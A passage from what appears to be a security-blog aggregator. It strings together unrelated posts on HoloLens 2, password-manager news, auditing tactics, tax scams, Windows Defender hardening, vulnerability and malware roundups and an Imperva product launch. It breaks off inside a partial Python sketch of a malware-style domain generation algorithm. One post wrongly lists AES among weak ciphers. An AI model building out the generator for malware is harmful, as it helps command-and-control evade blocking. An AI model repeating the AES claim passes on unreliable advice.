Azure Remote Rendering helps people experience 3D without compromise to fuel better, faster decisions. Today, to interact with high-quality 3D models on mobile devices and mixed reality headsets, you often need to “decimate,” or simplify, 3D models to run on target hardware. But in scenarios like design reviews and medical planning, every detail matters, and simplifying assets can result in a loss of important detail that is needed for key decisions. This service will render high-quality 3D content in the cloud and stream it to edge devices, all in real time, with every detail intact.
Azure Spatial Anchors is in public preview as of today. Azure Remote Rendering is now in private preview in advance of its public preview.
Microsoft HoloLens Customization Program
HoloLens is being used in a variety of challenging environments, from construction sites and operating rooms to the International Space Station. HoloLens has passed the basic impact tests from several protective eyewear standards used in North America and Europe. It has been tested and found to conform to the basic impact protection requirements of ANSI Z87.1, CSA Z94.3 and EN 166. With HoloLens 2 we’re introducing the Microsoft HoloLens Customization Program to enable customers and partners to customize HoloLens 2 to fit their environmental needs.
The first to take advantage of the HoloLens Customization Program is our long-standing HoloLens partner Trimble, which last year announced Trimble Connect for HoloLens along with a new hard hat solution that improves the utility of mixed reality for practical field applications. Today it announced the Trimble XR10 with Microsoft HoloLens 2, a new wearable hard hat device that enables workers in safety-controlled environments to access holographic information on the worksite.
Finally, as we closed things out, Alex Kipman articulated a set of principles around our open approach with the mixed reality ecosystem.
We believe that for an ecosystem to truly thrive there should be no barriers to innovation or customer choice.
To that end, Alex described how HoloLens embraces the principles of open stores, open browsers and open developer platforms.
To illustrate our dedication to these principles, we announced that our friends at Mozilla are bringing a prototype of the Firefox Reality browser to HoloLens 2, demonstrating our commitment to openness and the immersive web. Alex was also joined by Tim Sweeney, founder and CEO of Epic Games, who announced that Unreal Engine 4 support is coming to HoloLens.
In the coming months we will have more announcements and details to share. We look forward to continuing this journey with you all.
The post Microsoft at MWC Barcelona: Introducing Microsoft HoloLens 2 appeared first on The Official Microsoft Blog.
It was another travel week, so another slightly delayed weekly update, but still plenty of stuff going on all the same. Along with a private Sydney workshop earlier on, I'm talking about some free upcoming NDC meetup events in Brisbane and Melbourne that I'd love to get a great turnout for. I've just ordered 10k more HIBP stickers to last me through upcoming events, so they'll be coming with me.
In other news, there was old news appearing as new news about how hosed you are if your machine is compromised, with the level of hosing extending to your password manager. This will inevitably be another one of those times where something gets blown out of proportion (and context) in some of the news headlines, then we'll all go back to more sane discussions about assessing relative risks, likelihoods and impacts. There's also a very steady feed of breaches making their way into HIBP after appearing for sale on dark web marketplaces, so I give a bit of an update on those as well.
All that and more this week in a slightly shorter form than usual, enjoy!
- Catch me in Brisbane next week at the NDC meetup (free, and very close to capacity already)
- Or catch me in Melbourne a couple of weeks later for the NDC meetup there (that event has just gone up so there are tickets left, but there's also strong interest)
- Order yourself some Have I Been Pwned stickers (and help me by using the referral code in that blog post so I can buy more to give away at events)
- Twilio is sponsoring my blog this week (they're talking about how easy it is to use Authy for 2FA instead of risky SMS)
Today I received an email inviting me to buy an Easy File Shredder product for a special price of $15 instead of the usual price of $50.
Securely deleting sensitive data is really important. But is buying a product really needed?
This type of thing has generally been needed because when you delete a file, you are essentially marking the file space as unallocated, and until the space is used for new files, recovery software can “undelete” it.
For this reason, if I were deleting a sensitive file at work, I might use something like sdelete from Microsoft Sysinternals, or if I’d neglected to delete it securely, I’d use something like ‘cipher /w:F’ to wipe the file remnants from the drive’s free space.
Now I hear what you’re saying. These command line tools are fine, but a normal user might need a GUI. CCleaner has secure-delete functionality, as well as a free-space wiper that can be used.
But this isn’t even the worst part. Many, if not most, computers are now using SSDs for performance. The secure file deletion techniques I’ve described are for traditional drives. With SSDs you can’t securely delete a file by overwriting its original blocks: thanks to wear leveling, the logical blocks you overwrite may not map to the physical cells that held the data. A product like this is of questionable benefit.
What you need to do instead is make sure that you have full disk encryption enabled. On Windows this is BitLocker for your main drive and BitLocker To Go for your removable storage. Then if someone were trying to recover files that you’ve previously deleted, they would need to first successfully authenticate to the computer.
- Have a quiet word with the auditor/s about it, ideally before it gets written up and finalized in writing. Discuss the issue – talk it through, consider various perspectives. Negotiate a pragmatic mutually-acceptable resolution, or at least form a better view of the sticking points.
- Have a quiet word with your management and specialist colleagues about it, before the audit gets reported. Discuss the issue. Agree how you will respond and try to resolve this. Develop a cunning plan and gain their support to present a united front. Ideally, get management ready to demonstrate that they are definitely committing to fixing this e.g. with budget proposals, memos, project plans etc. to substantiate their commitment, and preferably firm timescales or agreed deadlines.
- Gather your own evidence to strengthen your case. For example:
- If you believe an issue is irrelevant to certification since there is no explicit requirement in 27001, identify the relevant guidance about the audit process from ISO/IEC 27007 plus the section of 27001 that does not state the requirement (!)
- If the audit finding is wrong, prove it wrong with credible counter-evidence, counter-examples etc. Quality of evidence does matter but quantity plays a part. Engage your extended team, management and the wider business in the hunt.
- If it’s a subjective matter, try to make it more objective e.g. by gathering and evaluating more evidence, more examples, more advice from other sources etc. ‘Stick to the facts’. Be explicit about stuff. Choose your words carefully.
- Ask us for second opinions and guidance e.g. on the ISO27k Forum and other social media, industry peers etc.
- Wing-it. Duck-and-dive. Battle it out. Cut-and-thrust. Wear down the auditor’s resolve and push for concessions, while making limited concessions yourself if you must. Negotiate using concessions and promises in one area to offset challenges and complaints in another. Agree on and work towards a mutually-acceptable outcome (such as, um, being certified!).
- Be up-front about it. Openly challenge the audit process, findings, analysis etc. Provide counter-evidence and arguments. Challenge the language/wording. Push the auditors to their limit. [NB This is a distinctly risky approach! Experienced auditors have earned their stripes and are well practiced at this, whereas it may be your first time. As a strategy, it could go horribly wrong, so what’s your fallback position? Do you feel lucky, punk?]
- Suck it up! Sometimes, the easiest, quickest, least stressful, least risky (in terms of being certified) and perhaps most business-like response is to accept it, do whatever you are being asked to do by the auditors and move on. Regardless of its validity for certification purposes, the audit point might be correct and of value to the business. It might actually be something worth doing … so swallow your pride and get it done. Try not to grumble or bear a grudge. Re-focus on other more important and pressing matters, such as celebrating your certification!
- Negotiate a truce. Challenge and discuss the finding and explore possible ways to address it. Get senior management to commit to whichever solution/s work best for the business and simultaneously persuade/convince the auditors (and/or their managers) of that.
- Push back informally by complaining to the certification body’s management and/or the body that accredited them. Be prepared to discuss the issue and substantiate your concerns with some evidence, more than just vague assertions and generalities.
- Push back hard. Review your contract with the certification body for anything useful to your case. Raise a formal complaint with the certification body through your senior management … which means briefing them and gaining their explicit support first. Good luck with that. You’ll need even stronger, more explicit evidence here. [NB This and the next bullet are viable options even after you have been certified … but generally, by then, nobody has the energy to pursue it and risk yet more grief.]
- Push back even harder. Raise a complaint with the accreditation body about the certification body’s incompetence through your senior management … which again means briefing them and gaining their explicit support first, and having the concrete evidence to make a case. Consider enlisting the help of your lawyers and compliance experts willing to get down to the brass tacks, and with the experience to build and present your case.
- Delay things. Let the dust settle. Review, reconsider, replan. Let your ISMS mature further, particularly in the areas that the auditors were critical of. Raise your game. Redouble your efforts. Use your metrics and processes fully.
- Consider engaging a different certification body (on the assumption that they won’t raise the same concerns … nor any others: they might be even harder to deal with!).
- Consider engaging different advisors, consultants and specialists. Review your extended ISMS team. Perhaps push for more training, to enhance the team’s competence in the problem areas. Perhaps broaden ‘the team’ to take on-board other specialists from across the business. Raise awareness.
- Walk away from the whole mess. Forget about certification. Go back to your cave to lick your wounds. Perhaps offer your resignation, accepting personal accountability for your part in the situation. Or fire someone else!
For cybercriminals, tax time is the most wonderful time of the year. They sit in the shadows, giddy and eager, methodically setting a variety of digital traps, knowing that enough taxpayers will take the bait to make their efforts worthwhile.
Indeed, with the frenzy of online tax filings, personal information (and money) moving through mailboxes, and hardworking people eagerly awaiting tax refunds, crooks are perfectly positioned for big returns this year.
So let’s be wiser and let’s be ready.
Last year, the IRS noted a 60 percent spike in bogus email schemes seeking to steal money or tax information. This year it’s a surge in phishing scams, says the IRS, that should have taxpayers on alert.
“The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails,” said IRS Commissioner Chuck Rettig. “Watch your inbox for these sophisticated schemes that try to fool you into thinking they’re from the IRS or our partners in the tax community. Taking a few simple steps can protect yourself during the holiday season and at tax time.”
Scams to Look For
According to the IRS, phishing emails are circulating with subjects such as “IRS Important Notice,” “IRS Taxpayer Notice” and other iterations of that message. The fraudulent emails may demand payment with the threat of seizing the recipient’s tax refund or even jail time.
Attacks may also use email or malicious links to solicit tax or financial information by posing as a trustworthy organization or even a personal friend or business associate of the recipient.
While some emails may have obvious spelling errors or grammar mistakes, some scammers have gone to great lengths to piece together a victim’s personal information to gain their trust. These emails look legitimate, have an authentic tone, and are crafted to get even skeptics to compromise personal data using malicious web links.
Scams include emails with hyperlinks that take users to a fake site, or PDF attachments that may download malware or viruses designed to grab sensitive information off your devices. With the right data in hand, such as a Social Security number, crooks can file fake returns and claim your tax refund, open credit cards, or run up medical bills.
Other tax scams include threatening phone calls from bogus IRS agents demanding immediate payment of past due tax bills and robocalls that leave urgent callback messages designed to scare victims into immediate payment.
Remember, the IRS will NOT:
- Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
- Call or email you to verify your identity by asking for personal and financial information.
- Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
- Require you to use a specific payment method for your taxes, such as a prepaid debit card.
- Ask for credit or debit card numbers over the phone, or
- Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.
How to Protect Yourself
Be hyper-aware. Never open a link or attachment from an unknown or suspicious source. In fact, approach all emails with caution even those from people you know. Scams are getting more sophisticated. According to the IRS, thieves can compromise a friend’s email address, or they may be spoofing the address with a slight change in the email text that is hard to recognize.
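That "slight change" in a spoofed address — say, rnybank.com in place of mybank.com — can also be spotted mechanically. Here's a hedged sketch of the idea; the domain list and similarity threshold are illustrative assumptions, not any vendor's actual heuristic:

```python
from difflib import SequenceMatcher

# Illustrative allowlist of domains you actually correspond with
KNOWN_DOMAINS = {"mybank.com", "irs.gov", "example.org"}

def looks_spoofed(sender: str, threshold: float = 0.8) -> bool:
    """Flag sender domains that are near, but not exact, matches of known ones."""
    domain = sender.rsplit("@", 1)[-1].lower()
    if domain in KNOWN_DOMAINS:
        return False  # exact match: a known correspondent, not a lookalike
    return any(
        SequenceMatcher(None, domain, known).ratio() >= threshold
        for known in KNOWN_DOMAINS
    )
```

A real mail filter would combine this with authentication signals (SPF, DKIM, DMARC) rather than relying on string similarity alone.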
Reduce your digital footprint. Now is a great time to go through your social accounts and online profiles, posts, and photos and boost your family’s privacy. Edit out any personal information such as your alma mater, your address, birthdate, pet names, children’s names, or mother’s maiden name. Consider making your social profiles private and filtering your friends’ list to actual people you know.
Have a strong password strategy. Cybercrooks count on their victims using the same password for multiple accounts. Lock them out by using unique passwords for separate accounts. Also, consider using two-factor authentication that requires a security code (sent to your phone) to access your account.
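Those one-time security codes are typically derived with the TOTP algorithm (RFC 6238): an HMAC over the current 30-second time interval, truncated to six or eight digits. A stdlib-only sketch, assuming a shared secret that has already been provisioned to your phone:

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, timestamp=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA1 variant)."""
    counter = int(timestamp if timestamp is not None else time.time()) // step
    msg = struct.pack(">Q", counter)               # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

Because both sides can compute the code from the secret and the clock, the code is useless to a crook a minute later — which is exactly why it makes a good second factor.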
Install security software. Phishing emails carry malware and viruses designed to infect your devices and grab your family’s sensitive data or even seize your computer via ransomware. Crooks aren’t messing around so neither should you. Meet fire with fire by investing in comprehensive security software to protect your devices.
If you are the victim of tax fraud or identity theft, take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, forward them to email@example.com (then delete the emails).
The post Don’t Take the Bait! How to Steer Clear of Tax Time Scams appeared first on McAfee Blogs.
A passenger on a Singapore Airlines flight this week noticed a small, circular indentation below the image playing on the seatback in-flight entertainment system in front of him. Could that be, he wondered, a camera?
The passenger did the only logical thing: He tweeted out a photo and asked the Twitterverse for opinions, setting off a chorus of complainers on Twitter.
Singapore Airlines also responded to the tweets, saying that the camera was not used by the airline to capture pictures or video. It then told media outlets in a statement that the embedded cameras “have been intended by the manufacturers for future developments. These cameras are permanently disabled on our aircraft and cannot be activated on board. We have no plans to enable or develop any features using the cameras.”
Notice anything new?
At ThreatConnect, our philosophy since our founding has been that we would incorporate intelligence in all aspects of security operations including orchestration and workflow, as functionality within our Platform. We believe (and always have) that an intelligence-led defense benefits organizations and allows better predictive and proactive strategic decision-making.
That said, like most, we are a work in progress. This year, we felt it was time to update our look, mature, and expand. So we decided a redefine was in order. We have streamlined our Platform, our logo, and our brand.
We use the term ‘redefine’, not ‘refresh’ or even ‘rebrand’. And maybe we’re splitting semantic hairs, but like I said, this is not about something new. This is about a recognition of the Platform in its next iteration. If you remember, in 2017 – two years ago – we launched TC Complete, our advanced intelligence-driven security operations and analytics platform. In TC Complete we introduced automation and orchestration using Playbooks. Then we brought out ThreatConnect’s CAL (Collective Analytics Layer), then the ROI calculator, numerous apps and integrations, and well, you get where I am going. We have long since expanded from serving largely the TI team to being used by security operations, incident response, and security leadership.
As always, we will continuously launch additional features and functionality that further our vision to be THE platform for security and bring you expanded value. Expect to see us take more strides in doubling down on supporting creation of good intel, making it operational across the team, and helping leaders manage the business of security. This brand redefine reflects all of that!
Without going into a lot of detail, the brand redefine was a complicated and overwhelming process as one might expect. And, well, it involved a lot of internal rounds of approvals (read: personal opinions), a lot of imbibing (not sure I was supposed to admit that), and much discussion. Iterations. Iterations. Iterations.
Ok, so maybe that was a lot of detail. Either way, you get it. It was arduous. But we prevailed.
The result is a new mark and look that we feel conveys a theme of motion and convergence. The new logo shows motion through its curve, and you’ll also see motion in the flow of the background illustrations on the website. Take a look. Movement is conveyed through the illustration and color gradient as well; a sense of momentum. We see this as a call to action — bringing an end to the old, inefficient way of doing things and taking a major stand for change. It is a rebellion against the status quo and yet, about the formation of a community. We hope it speaks to our Platform – dynamic and powerful.
We see our new mark and redefined brand as the natural evolution of our current brand: bright, optimistic, approachable. We hope you do, too.
The post A Change Will Do You (and Us) Good appeared first on ThreatConnect | Intelligence-Driven Security Operations.
The keystone to good security hygiene is limiting your attack surface. Attack surface reduction is a technique to remove or constrain exploitable behaviors in your systems. In this blog, we discuss the two attack surface reduction rules introduced in the most recent release of Windows and cover suggested deployment methods and best practices.
Software applications may use known, insecure methods, or methods later identified as useful for malware exploits. For example, macros are an old and powerful tool for task automation. However, macros can spawn child processes, invoke the Windows API, and perform other tasks which render them exploitable by malware.
Windows Defender Advanced Threat Protection (Windows Defender ATP) enables you to take advantage of attack surface reduction rules that allow you to control exploitable threat vectors in a simple and customizable manner. In previous releases of Windows we launched rules that let customers disallow remote process creation through WMI or PSExec and block Office applications from creating executable content. Other rules include the ability to disable scripts from creating executable content or blocking file executions unless age and prevalence criteria are met.
The latest attack surface reduction rules in Windows Defender ATP are based on system and application vulnerabilities uncovered by Microsoft and other security companies. Below we describe what these rules do. More importantly, we outline recommendations for deploying these rules in enterprise environments.
Block Office communication apps from creating child processes
The Block Office Communication Applications from Creating Child Processes rule protects against attacks that attempt to abuse the Outlook email client. For example, in late 2017 Sensepost demonstrated the DDEAUTO attack, which was later discovered to be applicable to Outlook as well. In this case, the attack surface reduction rule disables the creation of new processes from Outlook: DDE still works and data can still be exchanged between two running applications, but new processes cannot be created. It is important to note that DDE and DDEAUTO are legacy inter-process communication features available since 1987, and many line-of-business applications rely on this capability. If DDE is not used in your organization, or if you want to restrict DDE to already-running processes, this can be configured by using the AllowDDE registry key for Office.
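For reference, the AllowDDE value sits under the Office application's Security subkey (Outlook uses Word as its email editor, so Word's key is the relevant one). This is a sketch based on Microsoft's published DDE guidance; the Office version number (16.0 here) varies by install, so verify the path against your deployment before pushing it out:

```
Windows Registry Editor Version 5.00

; 0 = disable DDE, 1 = allow DDE to already-running programs only, 2 = fully enable
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"AllowDDE"=dword:00000001
```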
While rare, if your organization’s applications do create child processes from within Office communication applications, this attack surface reduction rule still provides protection: legitimate processes can be allowed through exclusions. By limiting the child processes Outlook can launch to only those with well-defined functionality, the rule prevents a potential exploit or social engineering threat from further infecting or compromising the system.
Block Adobe Reader from creating child processes
The second rule we’ve introduced, Block Adobe Reader from Creating Child Processes, limits the ability of a threat in a malicious PDF file to launch additional payloads, whether embedded in the PDF or downloaded by the threat, irrespective of how the malicious code in the PDF gained execution, either by social engineering or by exploiting an unknown vulnerability.
While there may be legitimate business reasons for a business PDF file to create a child process through scripting, this is a behavior that should be discouraged as it is prone to misuse. Our data indicates few legitimate applications utilize this technique. The Block Adobe Reader from Creating Child Processes rule disables child process creation in PDF content except for those files excluded by the IT administrator.
Recommendations on exclusions and deployment
Attack surface reduction rules close frequently used and exploitable behaviors in the operating system and in apps. However, legitimate line-of-business and commercial applications have been written utilizing these same behaviors. To enable non-malicious applications critical to your business, exclusions can be used if they are flagged as violating an attack surface reduction rule. Core Microsoft components, such as operating system files or Office applications, reside in a global exclusion list maintained as part of Defender. These do not need exclusions.
Exclusions, when applied, are honored by other Windows Defender ATP exploit mitigation features including Controlled folder access and Network protection, in addition to attack surface reduction rules. This simplifies exclusion management and standardizes application behavior.
Attack surface reduction rules have three settings: off, audit, and block. Our recommended practice to deploy attack surface reduction rules is to first implement the rule in audit mode.
Audit mode will identify exploitable behavior use but will not block the behavior. With audit, if you have a line of business application utilizing a behavior that is exploitable, the invoking application can be identified, and an exclusion added.
Rules can be enabled in audit with Group Policy, SCCM, or PowerShell. You can review the audited events with Advanced hunting and Alert investigation in Windows Defender Security Center; by creating a custom view in Windows Event Viewer; or using automated log aggregation tools like SIEM.
When audit telemetry reveals that line-of-business applications are no longer being impacted by the attack surface reduction rule, the attack surface reduction rule setting can be switched to block. This will protect against malware exploitation of the behavior.
For larger enterprises, Microsoft recommends deploying attack surface reduction rules in rings. Rings are groups of machines radiating outward like non-overlapping tree rings. When the inner ring is successfully deployed with required exclusions, the next ring can be deployed. One of the ways you can create a ring process is by creating specific groups of users or devices in Intune or with a Group Policy management tool.
Monitor attack surface reduction event telemetry
Once a rule is deployed in block mode, it is important to monitor the corresponding event telemetry, because this data carries important signals. For example, an application update may now require an exclusion, or multiple alerts from a user clicking executable email attachments can indicate that additional training is required. A sudden, large increase in attack surface reduction rule block events may be a single, random malware breach, or it may mean your organization is the target of a new, persistent attack attempting to use a vector covered by the rules.
Where to get more information and support
If you haven’t deployed any attack surface reduction rules, take a look at our documentation and discover how you can better protect your enterprise.
Minimizing your attack surface can yield large paybacks in decreased threat vulnerability and in allowing the security operations team to focus on other threat vectors.
As with all security features, enable attack surface reduction rules in a methodical, controlled manner that allows legitimate business applications to be excluded from analysis.
Peter Thayer and Iaan DSouza-Wiltshire (@IaanMSFT)
Windows Defender ATP
Talk to us
The post Recommendations for deploying the latest Attack surface reduction rules for maximum impact appeared first on Microsoft Secure.
Pangea Communications' Internet FAX Analog Telephone Adapter (ATA) contains an authentication bypass that can be abused to reboot the device, creating a continual denial-of-service condition. Internet FAX ATA versions 3.1.8 and prior are affected. Further information is available from an ICS-CERT advisory.
Cisco issued a batch of security advisories to address various vulnerabilities across its products lines. Among the most critical issues is a vulnerability in the Identity Services Engine (ISE) integration feature of Cisco Prime Infrastructure (PI) that could allow an unauthenticated, remote attacker to perform a man-in-the-middle attack against the Secure Sockets Layer tunnel established between ISE and PI. Customers should immediately apply any updates to mitigate risks.
Due to a highly critical remote code execution vulnerability, upgrades for Drupal have been released. This issue occurs when some field types do not properly sanitize data from non-form sources.
According to an advisory posted by the ICS-CERT, gpsd and microjson, which are frameworks from the gpsd Open Source Project, contain a stack-based overflow vulnerability. As reported on the gpsd website, gpsd can be found in many mobile embedded systems such as Android phones, drones, robot submarines, driverless cars, manned aircraft, marine navigation systems, and military vehicles. Mitigation techniques are discussed in the advisory.
Multiple potential security vulnerabilities in Intel Data Center Manager SDK may allow escalation of privilege, denial of service, or information disclosure. The vendor released software updates to mitigate these potential vulnerabilities.
A privilege escalation vulnerability in the LG Device Manager application affects the vendor's laptops. A security researcher found the vulnerability which can allow an attacker to exploit the Device Manager app through its low-level hardware access kernel-mode driver and elevate privileges. LG released a patch on February 13.
Microsoft announced that it will only sign Windows updates using the Secure Hash Algorithm 2 (SHA-2) and has begun the migration process from Secure Hash Algorithm 1 (SHA-1). Any customer running legacy Windows versions will need to have SHA-2 code-signing support installed by July 16. Further details are available in a vendor-issued post.
Oracle has uncovered a mobile ad fraud operation - "DrainerBot" - that is distributed through "millions of downloads of infected consumer apps." Infected apps, Oracle noted, can consume "more than 10GB of data per month downloading hidden and unseen video ads." The DrainerBot code is believed to have been distributed via an infected SDK (software development kit) that is integrated into consumer Android apps. Further information and remediation options are available via an Oracle press release.
Rockwell Automation's Allen-Bradley PowerMonitor 1000 is affected by cross-site scripting and authentication bypass vulnerabilities. All versions of PowerMonitor 1000, an energy metering device used in industrial control applications, are vulnerable. The ICS-CERT noted that the vendor is working on mitigations. Proof-of-concept exploits exist for both vulnerabilities.
Popular password managers contain a critical flaw that could enable adversaries to steal passwords. Independent Security Evaluators, which discovered the issue, examined 1Password, Dashlane, KeePass, and LastPass and determined that none of the products properly sanitized secrets, making it possible for an attacker to recover clear-text passwords from the products' memory. Each password manager left the master password or individual credentials in insecure memory on the computer, so an attacker who gained access to the system could steal the passwords.
An improper input validation vulnerability in Horner Automation's Cscape could crash the device being accessed, which may allow the attacker to read confidential information and remotely execute arbitrary code. Cscape is a control system application programming software and the fixed version, 9.90, is available for download. Further information can be found in an advisory posted by the ICS-CERT.
Delta Electronics' Industrial Automation CNCSoft can be exploited by an out-of-bounds read vulnerability that could lead to a buffer overflow condition that may allow information disclosure or crash the application. An ICS-CERT advisory suggests updating to the latest version of CNCSoft.
A hacker could capsize a ship with a cyber attack, researchers at Pen Test Partners have warned. Ship control systems, which include IP-to-serial converters, GPS receivers, or the Voyage Data Recorder, can all be easily hacked, and many continue to run outdated systems like Windows XP or Windows NT. The researchers also found that many Moxa device servers used aboard ships are vulnerable to a firmware downgrade attack that can allow them to be compromised. Researcher Ken Munro said, "If one was suitably motivated, perhaps by a nation state or a crime syndicate, one could bring about the sinking of a ship."
VMware posted an update to resolve a mishandled file descriptor vulnerability in runC container runtime. Successful exploitation of this issue may allow a malicious container to overwrite the contents of a host's runC binary and execute arbitrary code.
A malware variant is using two hacking tools to exploit a patched Windows SMB Server vulnerability and mine for Monero. The cryptocurrency miner is employing the MIMIKATZ and RADMIN tools to exfiltrate data and steal credentials. Trend Micro's research team has posted details about its findings on this malware.
Researchers at Deep Instinct have identified a phishing attack that uses malicious PDF documents to spread the Separ malware and swipe user data. The attack has affected hundreds of companies, located mainly in South East Asia and the Middle East, with some targets located in North America. Separ uses a combination of short script or batch files, and legitimate executables to carry out all of its malicious dealings.
McAfee, in conjunction with security firm Coveware, has released findings on the dynamics of the Ryuk ransomware. Coveware determined that Ryuk's ransom amounts averaged more than 10 times the average ransom and that some of Ryuk's ransoms were negotiable, although not all variants were. These negotiations generated an average ransom payment of $71,000 USD, a 60% discount from an average opening ask of $145,000.
Rietspoof, which was detected by Avast, is a multi-stage malware family that combines various file formats, to deliver a more versatile malware. The analysis shows that the first stage is delivered through instant messaging clients, such as Skype or Live Messenger. It then delivers a highly obfuscated Visual Basic Script with a hard-coded and encrypted second stage, a CAB file. The CAB file is expanded into an executable that is digitally signed with a valid signature, mostly using Comodo. The .exe installs a downloader in the fourth stage. Avast's researchers wrote, "What's interesting to note, is that the third stage uses a simple TCP protocol to communicate with its C&C (command and control server), whose IP address is hardcoded in the binary. The protocol is encrypted by AES in CBC mode. In one version we observed the key being derived from the initial handshake, and in a second version it was derived from a hard-coded string. In version two, the protocol not only supports its own protocol running over TCP, but it also tries to leverage HTTP/HTTPS requests."
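Avast's write-up doesn't publish the exact derivation, but "a key derived from a hard-coded string" typically means hashing the string down to an AES-sized key. A generic illustration of that pattern — the string and the use of SHA-256 here are assumptions for the sketch, not the malware's actual scheme:

```python
import hashlib

def derive_aes_key(hardcoded: str, key_bytes: int = 16) -> bytes:
    """Reduce a hard-coded string to a fixed-size key (AES-128 needs 16 bytes)."""
    return hashlib.sha256(hardcoded.encode("utf-8")).digest()[:key_bytes]
```

Hard-coding the input string, as Rietspoof's second version reportedly does, is convenient for the author but also a gift to analysts: once the binary is unpacked, the same derivation yields the key and the C&C traffic can be decrypted.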
Kaspersky Lab researchers detected a surge in activity by the RTM banking Trojan with more than 130,000 users attacked in 2018, a significant increase from 2,376 attacked users in 2017. As of mid-February, 30,000 users have been attacked in 2019. The Trojan is distributed through email phishing and once installed on the victim's computer, it gives the attackers full control over the infected system. The RTM Trojan then substitutes account details while an infected victim attempts to make a payment or transfer funds. It can also be used by cybercriminals to manually steal money using remote access tools.
Symantec discovered several potentially unwanted applications on the Microsoft Store that used the victim's CPU power to mine cryptocurrency. The apps came from three developers - DigiDream, 1clean, and Findoo - and all showed the same risky behavior. Once contacted, Microsoft removed the apps from the store.
When Imperva announced in 2018 it would acquire the application security solution provider Prevoty, a company I co-founded with Julien Bellanger, I knew it would be a win-win for our industry. Prevoty’s flagship product, Autonomous Application Protection, is the most mature, market-tested runtime application self-protection (RASP) solution (as proof, Prevoty was just named a Silver Winner in the Cybersecurity Excellence Awards). Together, Imperva and Prevoty are creating a consolidated, comprehensive platform for application and data security.
More importantly, this acquisition is a big win for our customers. The combination of Imperva and Autonomous Application Protection extends customers’ visibility into how applications behave and how users interact with sensitive information. With this expanded view across their business assets, customers will have deeper insights to understand and mitigate security risk at the edge, application, and database.
In parallel with product integrations, our teams of security innovators are coming together. I am delighted to join the Imperva team as CTO and to lead a highly accomplished group to radically transform the way our industry thinks about application and data security. In the coming horizon, we will boost data visibility throughout the stack, translate billions of data points into actionable insights, and intelligently automate responses that protect businesses. In fact, we just released two new features that deliver on those goals: Network Activity Protection and Weak Cryptography Protection. Learn more about these at Imperva.com and also in my interview with eWeek.
Network Activity Protection provides organizations with the ability to monitor and prevent unauthorized outbound network communications originating from within their applications, APIs, and microservices — a blind spot for organizations that are undergoing a digital transformation. Organizations now have a clear view into the various endpoints with which their applications communicate.
The new Weak Cryptography Protection feature offers the ability to monitor and protect against the use of specific weak hashing algorithms (including SHA-1, MD5) and cryptographic ciphers (including AES, 3DES/DES, RC4). Applications that leverage Autonomous Application Protection can now monitor and force compliant cryptographic practices.
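At its core, a feature like this checks observed algorithm choices against a policy blocklist. A toy sketch of the idea — the names and the policy itself are illustrative, not Imperva's implementation:

```python
# Illustrative policy: algorithm names this sketch treats as weak
WEAK_HASHES = {"md5", "sha-1", "sha1"}
WEAK_CIPHERS = {"des", "3des", "rc4"}

def audit_crypto(observed: list[str]) -> list[str]:
    """Return the subset of observed algorithm names that violate the policy."""
    weak = WEAK_HASHES | WEAK_CIPHERS
    return [name for name in observed if name.lower() in weak]
```

The hard part in a real product is not the lookup but the visibility: instrumenting the runtime so that every hash and cipher invocation inside the application is actually observed.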
Imperva is leading the world’s fight to keep data and applications safe from cyber criminals. Organizations that deploy Imperva will not have to choose between innovation and protecting their customers. The future of application and data security will be smarter and simpler, and we are leading the way there.
Imperva will be at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and learn about the New Imperva from me (I’ll be there Tuesday-Thursday) and other executives! We’ve revamped our suite of security solutions under a new license called FlexProtect that makes it simpler for organizations to deploy our security products and services to deliver the agility they need as they digitally transform their businesses.
Start your day or enjoy an afternoon pick-me-up by grabbing a coffee in our booth Tuesday through Thursday, 10 am to 2 pm, while you:
- See a demo of our latest products in the areas of cloud app and data security and data risk analytics
- Learn more about how our suite of security solutions works in AWS environments
Imperva will also be at the AWS booth (1227 in the South Expo hall). There, you can:
- Hear how one of our cloud customers, a U.S.-based non-profit with nearly 40 million members, uses AAP to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth
- See a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm
Finally – we will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” at RSA. It will first broadcast at 9:30 am on March 6th and feature George McGregor, vice president of product marketing at Imperva, in a Q&A with executives from several other vendors on the possibility of a cyber battle between AI systems, which experts predict might be on the horizon in the next three to five years. Register and watch for free!
The post Imperva Makes Major Expansion in Application Security appeared first on Blog.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to produce potential command and control (C2) domains from which it attempts to retrieve additional payloads.
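A domain generation algorithm is easy to illustrate. The sketch below is a hypothetical, simplified DGA in the spirit of such families (not Nymaim's actual algorithm): it derives a deterministic list of candidate C2 domains from a hard-coded seed and the current date, so malware and operator can rendezvous without any domain being hard-coded into the binary.

```python
import hashlib

def generate_domains(seed, day, count=5):
    # Derive pseudo-random but deterministic domain names from a seed
    # and a date string; both sides of the C2 channel can compute the
    # same list, so defenders must predict it to block it.
    domains = []
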